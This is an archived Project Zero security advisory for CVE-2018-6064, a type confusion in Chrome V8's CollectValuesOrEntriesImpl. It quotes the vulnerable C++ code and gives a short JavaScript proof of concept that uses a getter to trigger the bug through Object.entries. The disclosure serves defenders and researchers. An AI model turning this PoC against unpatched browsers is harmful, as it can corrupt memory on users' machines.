Lucene search

K
packetstormGoogle Security ResearchPACKETSTORM:147025
HistoryApr 03, 2018 - 12:00 a.m.

Chrome V8 ElementsAccessorBase::CollectValuesOrEntriesImpl Type Confusion

2018-04-0300:00:00
Google Security Research
packetstormsecurity.com
22

0.584 Medium

EPSS

Percentile

97.4%

`Chrome: V8: Type confusion in ElementsAccessorBase::CollectValuesOrEntriesImpl   
  
CVE-2018-6064  
  
  
Here's a snippet of the method.  
<a href="https://cs.chromium.org/chromium/src/v8/src/elements.cc?rcl=3cbf26e8a21aa76703d2c3c51adb9c96119500da&l=1051" title="" class="" rel="nofollow">https://cs.chromium.org/chromium/src/v8/src/elements.cc?rcl=3cbf26e8a21aa76703d2c3c51adb9c96119500da&l=1051</a>  
  
static Maybe<bool> CollectValuesOrEntriesImpl(  
Isolate* isolate, Handle<JSObject> object,  
Handle<FixedArray> values_or_entries, bool get_entries, int* nof_items,  
PropertyFilter filter) {  
...  
for (int i = 0; i < keys->length(); ++i) {  
Handle<Object> key(keys->get(i), isolate);  
Handle<Object> value;  
uint32_t index;  
if (!key->ToUint32(&index)) continue;  
uint32_t entry = Subclass::GetEntryForIndexImpl(  
isolate, *object, object->elements(), index, filter);  
if (entry == kMaxUInt32) continue;  
  
PropertyDetails details = Subclass::GetDetailsImpl(*object, entry);  
  
if (details.kind() == kData) {  
value = Subclass::GetImpl(isolate, object->elements(), entry);  
} else {  
LookupIterator it(isolate, object, index, LookupIterator::OWN);  
ASSIGN_RETURN_ON_EXCEPTION_VALUE(  
isolate, value, Object::GetProperty(&it), Nothing<bool>()); <<------- (a)  
}  
if (get_entries) {  
value = MakeEntryPair(isolate, index, value);  
}  
values_or_entries->set(count++, *value);  
}  
  
*nof_items = count;  
return Just(true);  
}  
  
At (a), the elements kind can be changed by getters. This will lead to type confusion in GetEntryForIndexImpl.  
  
PoC:  
let arr = [];  
arr[1000] = 0x1234;  
  
arr.__defineGetter__(256, function () {  
delete arr[256];  
  
arr.unshift(1.1);  
arr.length = 0;  
});  
  
Object.entries(arr).toString();  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`